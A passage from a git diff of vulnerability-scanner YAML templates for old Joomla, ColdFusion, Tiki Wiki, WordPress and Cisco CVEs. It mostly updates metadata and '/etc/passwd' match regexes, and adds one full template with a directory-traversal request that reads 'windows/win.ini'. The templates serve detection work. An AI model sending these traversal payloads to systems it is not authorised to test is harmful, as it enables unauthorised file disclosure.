allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/14017 - https://www.cvedetails.com/cve/CVE-2010-2682 + - http://packetstormsecurity.org/1004-exploits/joomlarealtyna-lfi.txt + - http://www.exploit-db.com/exploits/14017 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2682 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2857.yaml b/cves/2010/CVE-2010-2857.yaml index 1478adabab..8450d34103 100644 --- a/cves/2010/CVE-2010-2857.yaml +++ b/cves/2010/CVE-2010-2857.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component Music Manager - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html. - reference: | + description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html. + reference: - https://www.exploit-db.com/exploits/14274 - https://www.cvedetails.com/cve/CVE-2010-2857 + - http://www.securityfocus.com/bid/41485 + - http://www.exploit-db.com/exploits/14274 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2857 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2861.yaml b/cves/2010/CVE-2010-2861.yaml index 7f29024985..5b56103782 100644 --- a/cves/2010/CVE-2010-2861.yaml +++ b/cves/2010/CVE-2010-2861.yaml @@ -8,7 +8,13 @@ info: reference: - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 - http://www.adobe.com/support/security/bulletins/apsb10-18.html - tags: cve,cve2010,coldfusion,lfi + - http://securityreason.com/securityalert/8148 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2861 + metadata: + shodan-query: http.component:"Adobe ColdFusion" + tags: cve,cve2010,coldfusion,lfi,adobe requests: - method: GET @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2918.yaml b/cves/2010/CVE-2010-2918.yaml index b8ddd64eb5..7b5d84d7fa 100644 --- a/cves/2010/CVE-2010-2918.yaml +++ b/cves/2010/CVE-2010-2918.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion author: daffainfo severity: high - description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. + description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. reference: - https://www.exploit-db.com/exploits/31708 - https://www.cvedetails.com/cve/CVE-2010-2918 + - http://www.securityfocus.com/bid/28942 + - https://www.exploit-db.com/exploits/14476 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2918 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-2920.yaml b/cves/2010/CVE-2010-2920.yaml index 48974bc25f..67f0851855 100644 --- a/cves/2010/CVE-2010-2920.yaml +++ b/cves/2010/CVE-2010-2920.yaml @@ -4,10 +4,14 @@ info: name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12120 - https://www.cvedetails.com/cve/CVE-2010-2920 + - http://www.vupen.com/english/advisories/2010/1844 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2920 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-3203.yaml b/cves/2010/CVE-2010-3203.yaml index 7f5245195e..17042d0b25 100644 --- a/cves/2010/CVE-2010-3203.yaml +++ b/cves/2010/CVE-2010-3203.yaml @@ -1,13 +1,18 @@ id: CVE-2010-3203 info: - name: Joomla! Component PicSell 1.0 - Local File Disclosure + name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval author: daffainfo severity: high - description: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. - reference: | + description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. + reference: - https://www.exploit-db.com/exploits/14845 - https://www.cvedetails.com/cve/CVE-2010-3203 + - http://secunia.com/advisories/41187 + - http://www.exploit-db.com/exploits/14845 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-3203 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-3426.yaml b/cves/2010/CVE-2010-3426.yaml index 9eece26cbd..9a7401132f 100644 --- a/cves/2010/CVE-2010-3426.yaml +++ b/cves/2010/CVE-2010-3426.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/14964 - https://www.cvedetails.com/cve/CVE-2010-3426 + - http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt + - http://www.exploit-db.com/exploits/14964 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-3426 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-4231.yaml b/cves/2010/CVE-2010-4231.yaml index 282ff28783..3c77231b1e 100644 --- a/cves/2010/CVE-2010-4231.yaml +++ b/cves/2010/CVE-2010-4231.yaml @@ -4,11 +4,16 @@ info: name: Camtron CMNC-200 IP Camera - Directory Traversal author: daffainfo severity: high - description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. + description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 - https://www.exploit-db.com/exploits/15505 - tags: cve,cve2010,iot,lfi + - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt + - http://www.exploit-db.com/exploits/15505/ + remediation: Upgrade to a supported product version. + classification: + cve-id: CVE-2010-4231 + tags: cve,cve2010,iot,lfi,camera requests: - method: GET @@ -19,8 +24,10 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-4239.yaml b/cves/2010/CVE-2010-4239.yaml new file mode 100644 index 0000000000..c2b4d8c476 --- /dev/null +++ b/cves/2010/CVE-2010-4239.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-4239 + +info: + name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion + author: 0x_akoko + severity: critical + description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability. + reference: + - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt + - https://www.openwall.com/lists/oss-security/2010/11/22/9 + - https://security-tracker.debian.org/tracker/CVE-2010-4239 + - https://nvd.nist.gov/vuln/detail/CVE-2010-4239 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2010-4239 + cwe-id: CWE-20 + tags: cve,cve2010,tikiwiki,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini" + + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + +# Enhanced by mp on 2022/05/18 diff --git a/cves/2010/CVE-2010-4282.yaml b/cves/2010/CVE-2010-4282.yaml index 074fd7401b..527fe7df51 100644 --- a/cves/2010/CVE-2010-4282.yaml +++ b/cves/2010/CVE-2010-4282.yaml @@ -8,7 +8,12 @@ info: reference: - https://www.exploit-db.com/exploits/15643 - https://www.cvedetails.com/cve/CVE-2010-4282 - tags: cve,cve2010,lfi,joomla + - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download + - http://www.exploit-db.com/exploits/15643 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-4282 + tags: cve,cve2010,lfi,joomla,phpshowtime requests: - method: GET @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-4617.yaml b/cves/2010/CVE-2010-4617.yaml index 6b8918ae9b..f172f0e5d8 100644 --- a/cves/2010/CVE-2010-4617.yaml +++ b/cves/2010/CVE-2010-4617.yaml @@ -4,10 +4,14 @@ info: name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. reference: - https://www.exploit-db.com/exploits/15791 - https://www.cvedetails.com/cve/CVE-2010-4617 + - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-4617 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-4719.yaml b/cves/2010/CVE-2010-4719.yaml index 145fed21d3..a9ab51ae4f 100644 --- a/cves/2010/CVE-2010-4719.yaml +++ b/cves/2010/CVE-2010-4719.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component JRadio - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/15749 - https://www.cvedetails.com/cve/CVE-2010-4719 + - http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt + - http://www.exploit-db.com/exploits/15749 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-4719 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-4769.yaml b/cves/2010/CVE-2010-4769.yaml index 3de9150cf4..3613fefedc 100644 --- a/cves/2010/CVE-2010-4769.yaml +++ b/cves/2010/CVE-2010-4769.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php. + description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php. reference: - https://www.exploit-db.com/exploits/15585 - https://www.cvedetails.com/cve/CVE-2010-4769 + - http://secunia.com/advisories/42324 + - http://www.securityfocus.com/bid/44992 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-4769 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/cves/2010/CVE-2010-4977.yaml b/cves/2010/CVE-2010-4977.yaml index eb135d7ccc..710afbfc65 100644 --- a/cves/2010/CVE-2010-4977.yaml +++ b/cves/2010/CVE-2010-4977.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component Canteen 1.0 - Local File Inclusion author: daffainfo severity: high - description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. + description: A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. reference: - https://www.exploit-db.com/exploits/34250 - https://www.cvedetails.com/cve/CVE-2010-4977 + - http://www.salvatorefresta.net/files/adv/Canteen%20Joomla%20Component%201.0%20Multiple%20Remote%20Vulnerabilities-04072010.txt + - http://packetstormsecurity.org/1007-exploits/joomlacanteen-lfisql.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-4977 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2010/CVE-2010-5028.yaml b/cves/2010/CVE-2010-5028.yaml index 01a95abcad..bec5af6fe6 100644 --- a/cves/2010/CVE-2010-5028.yaml +++ b/cves/2010/CVE-2010-5028.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component JE Job 1.0 - Local File Inclusion author: daffainfo severity: high - description: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. + description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. reference: - https://www.exploit-db.com/exploits/12601 - https://www.cvedetails.com/cve/CVE-2010-5028 + - http://www.vupen.com/english/advisories/2010/1269 + - http://www.securityfocus.com/bid/40193 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-5028 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2010/CVE-2010-5278.yaml b/cves/2010/CVE-2010-5278.yaml index d0ad27b0a9..7bc17d9f24 100644 --- a/cves/2010/CVE-2010-5278.yaml +++ b/cves/2010/CVE-2010-5278.yaml @@ -4,10 +4,14 @@ info: name: MODx manager - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter. + description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled. reference: - https://www.exploit-db.com/exploits/34788 - https://www.cvedetails.com/cve/CVE-2010-5278 + - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt + - http://secunia.com/advisories/41638 + classification: + cve-id: CVE-2010-5278 tags: cve,cve2010,lfi requests: @@ -27,3 +31,5 @@ requests: - "extensions" condition: and part: body + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2010/CVE-2010-5286.yaml b/cves/2010/CVE-2010-5286.yaml index e27c4edeb5..4513d4a5de 100644 --- a/cves/2010/CVE-2010-5286.yaml +++ b/cves/2010/CVE-2010-5286.yaml @@ -4,10 +4,15 @@ info: name: Joomla! Component Jstore - 'Controller' Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34837 - https://www.cvedetails.com/cve/CVE-2010-5286 + - http://www.securityfocus.com/bid/44053 + - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-5286 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-0049.yaml b/cves/2011/CVE-2011-0049.yaml index f916e1470c..3591729937 100644 --- a/cves/2011/CVE-2011-0049.yaml +++ b/cves/2011/CVE-2011-0049.yaml @@ -4,11 +4,15 @@ info: name: Majordomo2 - SMTP/HTTP Directory Traversal author: pikpikcu severity: high - description: Directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. + description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. reference: - https://www.exploit-db.com/exploits/16103 - https://nvd.nist.gov/vuln/detail/CVE-2011-0063 - http://www.kb.cert.org/vuls/id/363726 + - https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2011-0049 tags: cve,cve2011,majordomo2,lfi requests: @@ -21,9 +25,11 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" condition: and - type: status status: - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-1669.yaml b/cves/2011/CVE-2011-1669.yaml index 38bb238226..9594dcd762 100644 --- a/cves/2011/CVE-2011-1669.yaml +++ b/cves/2011/CVE-2011-1669.yaml @@ -4,10 +4,14 @@ info: name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI) author: daffainfo severity: high - description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. + description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 - https://www.exploit-db.com/exploits/17119 + - http://www.securityfocus.com/bid/47146 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2011-1669 tags: cve,cve2011,wordpress,wp-plugin,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-2744.yaml b/cves/2011/CVE-2011-2744.yaml index 041e731693..c303e15090 100644 --- a/cves/2011/CVE-2011-2744.yaml +++ b/cves/2011/CVE-2011-2744.yaml @@ -4,10 +4,14 @@ info: name: Chyrp 2.x - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. + description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. reference: - https://www.exploit-db.com/exploits/35945 - https://www.cvedetails.com/cve/CVE-2011-2744 + - http://www.openwall.com/lists/oss-security/2011/07/13/6 + - http://secunia.com/advisories/45184 + classification: + cve-id: CVE-2011-2744 tags: cve,cve2011,lfi,chyrp requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-2780.yaml b/cves/2011/CVE-2011-2780.yaml index 1cb0a0ac54..6b3715bb3b 100644 --- a/cves/2011/CVE-2011-2780.yaml +++ b/cves/2011/CVE-2011-2780.yaml @@ -1,11 +1,10 @@ id: CVE-2011-2780 info: - name: Chyrp 2.x - Local File Inclusion (LFI) + name: Chyrp 2.x - Local File Inclusion author: daffainfo severity: high - tags: cve,cve2011,lfi,chyrp - description: "Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744." + description: A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744. reference: - http://www.justanotherhacker.com/advisories/JAHx113.txt - http://www.openwall.com/lists/oss-security/2011/07/13/5 @@ -17,6 +16,10 @@ info: - http://securityreason.com/securityalert/8312 - https://exchange.xforce.ibmcloud.com/vulnerabilities/68565 - http://www.securityfocus.com/archive/1/518890/100/0/threaded + classification: + cve-id: CVE-2011-2780 + remediation: Upgrade to a supported version. + tags: cve,cve2011,lfi,chyrp requests: - method: GET @@ -28,8 +31,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-3315.yaml b/cves/2011/CVE-2011-3315.yaml index 855379ffba..f5589ecd62 100644 --- a/cves/2011/CVE-2011-3315.yaml +++ b/cves/2011/CVE-2011-3315.yaml @@ -4,8 +4,14 @@ info: name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049. - reference: https://www.exploit-db.com/exploits/36256 + description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049. + reference: + - https://www.exploit-db.com/exploits/36256 + - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-uccx + - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-cucm + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2011-3315 tags: cve,cve2011,lfi,cisco requests: @@ -18,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml index 1fe124e5d4..43736129ab 100644 --- a/cves/2011/CVE-2011-4336.yaml +++ b/cves/2011/CVE-2011-4336.yaml @@ -1,20 +1,21 @@ id: CVE-2011-4336 info: - name: Tiki Wiki CMS Groupware 7.0 has XSS + name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting author: pikpikcu severity: medium - description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php. + description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 - tags: cve,cve2011,xss,tikiwiki classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2011-4336 cwe-id: CWE-79 + remediation: Upgrade to a supported version. + tags: cve,cve2011,xss,tikiwiki requests: - method: GET @@ -36,3 +37,5 @@ requests: part: header words: - text/html + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-4618.yaml b/cves/2011/CVE-2011-4618.yaml index 301cd48ca3..f28fb520ae 100644 --- a/cves/2011/CVE-2011-4618.yaml +++ b/cves/2011/CVE-2011-4618.yaml @@ -1,11 +1,18 @@ id: CVE-2011-4618 info: - name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS) + name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618 + description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4618 + - http://www.securityfocus.com/archive/1/520589 + - http://wordpress.org/support/topic/wordpress-advanced-text-widget-plugin-cross-site-scripting-vulnerabilities + - http://archives.neohapsis.com/archives/bugtraq/2012-04/0119.html + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2011-4618 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-4624.yaml b/cves/2011/CVE-2011-4624.yaml index 2ae32f0d66..ec6bb48304 100644 --- a/cves/2011/CVE-2011-4624.yaml +++ b/cves/2011/CVE-2011-4624.yaml @@ -1,11 +1,18 @@ id: CVE-2011-4624 info: - name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS) + name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624 + description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4624 + - http://archives.neohapsis.com/archives/bugtraq/2011-12/0180.html + - http://www.openwall.com/lists/oss-security/2011/12/23/2 + - http://plugins.trac.wordpress.org/changeset/469785 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2011-4624 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2011/CVE-2011-4804.yaml 